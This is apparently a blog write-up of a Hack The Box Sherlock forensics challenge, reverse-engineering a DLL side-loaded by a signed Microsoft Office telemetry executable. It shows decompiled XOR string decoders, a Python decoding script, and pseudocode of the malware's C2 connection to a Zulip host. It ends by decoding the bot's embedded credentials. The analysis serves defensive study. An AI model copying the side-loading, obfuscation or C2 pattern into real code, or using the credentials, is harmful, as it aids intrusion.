Einladen mso.dll Reverse Engineering
In the Einladen Sherlock, there’s an HTA file that drops a Microsoft signed legit executable, two DLLs, and a PDF. I’m able to use the PCAP and Procmon data to figure out where to go next, without reverse-engineering the malware. In the embedded YouTube video, I’ll dive into the DLL side-load, how the binary loads winint.dll secretly, decrypts stack strings, and contacts the C2, with a summary of the analysis in this post.
Overview
Situation
In the Einladen Sherlock, I’ll work through the following malware artifacts:
flowchart TD;
A[<a href="/2024/05/02/htb-sherlock-einladen.html#downloaderhtml">downloader.html</a>]-->B[<a href="/2024/05/02/htb-sherlock-einladen.html#invitation_farewell_de_embzip">Invitation_Farewell_DE_EMB.zip</a>];
B-->C[<a href="/2024/05/02/htb-sherlock-einladen.html#invitation_farewell_de_embhta">Invitation_Farewell_DE_EMB.hta</a>];
C-->D[<a href='/2024/05/02/htb-sherlock-einladen.html#pdf'>Invitation.pdf</a>];
C-->E;
C-->F;
C-->G;
subgraph malware[" "]
E[<a href="/2024/05/09/htb-sherlock-einladen-malware-re.html#msoevexe">msoev.exe</a>];
F[<a href="/2024/05/09/htb-sherlock-einladen-malware-re.html#msodll">mso.dll</a>];
G[<a href="/2024/05/09/htb-sherlock-einladen-malware-re.html#appvisvsubsystems64dll">AppVIsvSubsystems64.dll</a>];
H[<a href="/2024/05/02/htb-sherlock-einladen.html#pcap">msoev.pcapng</a>];
I[<a href="/2024/05/02/htb-sherlock-einladen.html#procmon-logs">Logfile.PML</a>];
end
E-. ? .->J[<a href="/2024/05/02/htb-sherlock-einladen.html#uncjs">unc.js</a>];
J-->K[<a href="/2024/05/02/htb-sherlock-einladen.html#bat-file-analysis">richpear.bat</a>];
K-->L[<a href="/2024/05/02/htb-sherlock-einladen.html#empireclientexe">EmpireClient.exe</a>];
M[sheet.hta];
linkStyle default stroke-width:2px,stroke:#FFFF99,fill:none;
linkStyle 6 stroke-width:2px,stroke:#FFFF99,fill:none;
style malware fill:#666;
A malicious HTA file dropped a legit Microsoft signed executable, msoev.exe
, as well as two DLLs to disk and ran the EXE, executing a DLL side-loading attack to run the malware from one of the DLLs. In solving, I’ll use PCAP collection and Procmon logs collected while running the malware to conclude that the malware is using the Zulip chat service as C2, connecting to toyy.zulipchat.com
.
It was not necessary to reverse engineer the malware at all. Still, it’s interesting to do that, which I’ll take a quick look through here.
Video Analysis
Most of the analysis will be done in this video:
msoev.exe
Purpose
msoev.exe
, according to spyshelter.com is:
a process made by Microsoft itself to collect Telemetry information for the Microsoft Office software. The Telemetry helps Microsoft fix issues, and improve the Office software, like Word, Excel, or Outlook.
Strings in the binary match up with that:
Imports
It’s not worth doing detail analysis of the signed Microsoft binary, but it is worth understanding it’s imports, especially related to the two DLLs dropped with it by the phishing. I’ll open it in Ghidra and take a look:
Most of these will be installed on Windows by default, but the two that drop with it are likely binaries that come when msoev.exe
gets installed. The malware only needs one of these to get loaded to run it’s malicious code, but both will need to be present to not induce errors in the binary.
AppVIsvSubsystems64.dll
Overview
Of the two DLLs dropped, AppVIsvSubsystems64.dll
is the uninteresting one. It’s actually a bit surprising that it scores so poorly on VirusTotal, as it doesn’t really do anything at all, let alone malicious:
It shows that AV engines are detecting this because it’s a part of this DLL side-loading attack, not because it does anything wrong.
Reverse Engineering
I’ll open AppVIsvSubsystems64.dll
in Ghidra to take a look. It has two exports, and they are the only two functions:
Above msoev.exe
called ordinal_1
from this DLL. Ghidra has commented labeling APIExportForDetours
as ordinal_1
:
This function does exactly nothing:
void APIExportForDetours(void)
{
/* 0x1010 1 APIExportForDetours
0x1010 2 CurrentThreadIsVirtualized
0x1010 3 IsProcessHooked
0x1010 4 RequestUnhookedFunctionList
0x1010 5 VirtualizeCurrentProcess
0x1010 6 VirtualizeCurrentThread */
return;
}
The entry
function is just as simple, just returning 1:
int entry(void)
{
return 1;
}
This binary is just here to keep msoev.exe
from erroring and to do nothing.
mso.dll
Overview
Exports
The exports of mso.dll
pretty much line up with what is called by msoev.exe
::
CommandLineToArgvWTT
is ordinal_1777
:
That makes it the function that is called by msoev.exe
. I started taking a look at this function, but it will make more sense to come back to later.
Imports
I’ll also look at what’s imported, the one that jumps out as most interesting being ShellExecuteA
:
The rest of the imports aren’t that interesting.
Strings
Looking at the strings in mso.dll
, there’s one that jumps out to me as interesting:
There are other .dll
strings, but this one isn’t in the imports. Why would the binary need a string to a DLL that it isn’t importing? That can mean that it’s going to load the DLL via another way to get access to the functions in it (in this case network functions) without showing that it will do that.
Open Dummy
ShellExecuteA
Seeing that the DLL imports ShellExecuteA
, I’ll take a look at where that’s used, in FUN_2ac403110
:
bool FUN_2ac403110(void)
{
LPCSTR lpFile;
LPCSTR lpOperation;
HINSTANCE pHVar1;
undefined4 local_2f;
undefined2 local_2b;
undefined local_29;
undefined8 local_28;
undefined8 local_20;
undefined local_18;
local_28 = 0x667b6e7b66796146;
local_20 = 0xf696b7f216160;
local_18 = 0xf;
/* Decodes to "Invitation.pdf" */
lpFile = (LPCSTR)FUN_2ac406170((byte *)&local_28);
local_29 = 5;
local_2f = 0x6b60756a;
local_2b = 5;
/* Decodes to "open" */
lpOperation = (LPCSTR)FUN_2ac4063b0((byte *)&local_2f);
pHVar1 = ShellExecuteA((HWND)0x0,lpOperation,lpFile,(LPCSTR)0x0,(LPCSTR)0x0,1);
return 0x20 < (int)pHVar1;
}
ShellExecuteA
takes an operation and a file, each of which here are decoded by custom XOR functions FUN_2ac406170
and FUN_2ac4063b0
. So this function is ShellExecuteA(NULL, "open", "Invitation.pdf", NULL, NULL, 1)
, responsible for opening the decoy document. The idea here is that when the user double-clicks on the HTA file, it writes these binaries, and then this binary opens a PDF, so the user thinks that’s all that’s happned.
XOR Decrypt Functions
The binary uses tons of these custom XOR functions. They all check that the byte at some offset is null, and then XOR the bytes up to that offset with the byte after the null. For example, FUN_2ac406170
:
void FUN_2ac406170(byte *param_1)
{
byte *pbVar1;
if (param_1[0xf] == 0) {
pbVar1 = param_1;
do {
*pbVar1 = *pbVar1 ^ param_1[0x10];
pbVar1 = pbVar1 + 1;
} while (pbVar1 != param_1 + 0xf);
param_1[0xf] = 1;
}
return;
}
This one makes sure 15 is null, then xors 0-14 with the value at 16.
To make my life a bit easier, I’ll write a quick python script that will pull the stack strings and decode them:
#!/usr/bin/env python3
import sys
def decode_word(word, key):
data = bytes.fromhex(word.rjust(32, '0'))[::-1]
return ''.join(chr(b^key) for b in data)
key = int(sys.argv[-1], 16)
result = ''
for blob in sys.argv[1:-1]:
result += decode_word(blob.lstrip('0x'), key)
print(result)
I can run this with the stack words and the key and get the result:
oxdf@hacky$ python decode.py 667b6e7b66796146 0f696b7f216160 f
Invitation.pdf
Internet Activity
There’s a string, wininet.dll
in the strings in this binary, but it’s not referenced as an import. Jumping to where it’s used, I’ll find FUN_2ac402f20
. At the top it has another similarly obfuscated string that translates to LdrLoadDll
, which according to malapi.io is “used instead of LoadLibrary to load modules”:
It seems this function is loading wininet.dll
.
Stepping up to where FUN_2ac402f20
is called in FUN_2ac4031a0
, the result is checked and passed to FUN_2ac402b90
:
Stepping into FUN_2ac402b90
, there are a bunch more encoded strings, each passed to a function to decode them, and then the result passed to FUN_2ac4018f0
along with param1
, which is the wininit_module
, with the result being stored global variables:
I’ve renamed these globals to be the decoded strings.
I’ll find references to one of the globals, and there are two each:
The first line context is “WRITE”, which is what I was just looking at. Jumping to the “READ”, all of them land in FUN_2ac401dc0
, which has a bunch more strings to decode and uses the functions:
This function ends up as the following pseudocode:
hinternet = InternetOpenA("Curl/7.68.0", 0, 0, 0, 0)
hsession = InternetConnectA(hinternet, "toyy.zulipchat.com", 443, 0, 0, 0, INTERNET_SERVICE_HTTP, 0, 1)
hrequest = HttpOpenRequestA(hsession, param1, param2, 0, 0, 0, 0x44c03100, 1)
successful = HttpSendRequestA(hrequest, headers, len(headers), param_3, param4)
InternetReadFile(hrequest, global_buffer, 0x100000, bytes_read_buffer)
The flags for HttpOpenRequestA
, 0x44c03100, are interesting, and as defined here break down to:
- 0x40000000: INTERNET_FLAG_RAW_DATA
- 0x04000000: INTERNET_FLAG_DONT_CACHE
- 0x00800000: INTERNET_FLAG_SECURE
- 0x00400000: INTERNET_FLAG_KEEP_CONNECTION
- 0x00002000: INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
- 0x00001000: INTERNET_FLAG_IGNORE_CERT_CN_INVALID
- 0x00000100:INTERNET_FLAG_PRAGMA_NOCACHE
The headers
from HttpSendRequestA
are also interesting:
Content-Type: application/x-www-form-urlencoded
Authorization: Basic Z2Ficy1ib3RAdG95eS56dWxpcGNoYXQuY29tOnhKWmY4amFxd1g1NEhXYWxpWGZtNHUyYk1XQ3pOb0x6
The Basic auth decodes to a username and password:
oxdf@hacky$ echo "Z2Ficy1ib3RAdG95eS56dWxpcGNoYXQuY29tOnhKWmY4amFxd1g1NEhXYWxpWGZtNHUyYk1XQ3pOb0x6" | base64 -d
gabs-bot@toyy.zulipchat.com:xJZf8jaqwX54HWaliXfm4u2bMWCzNoLz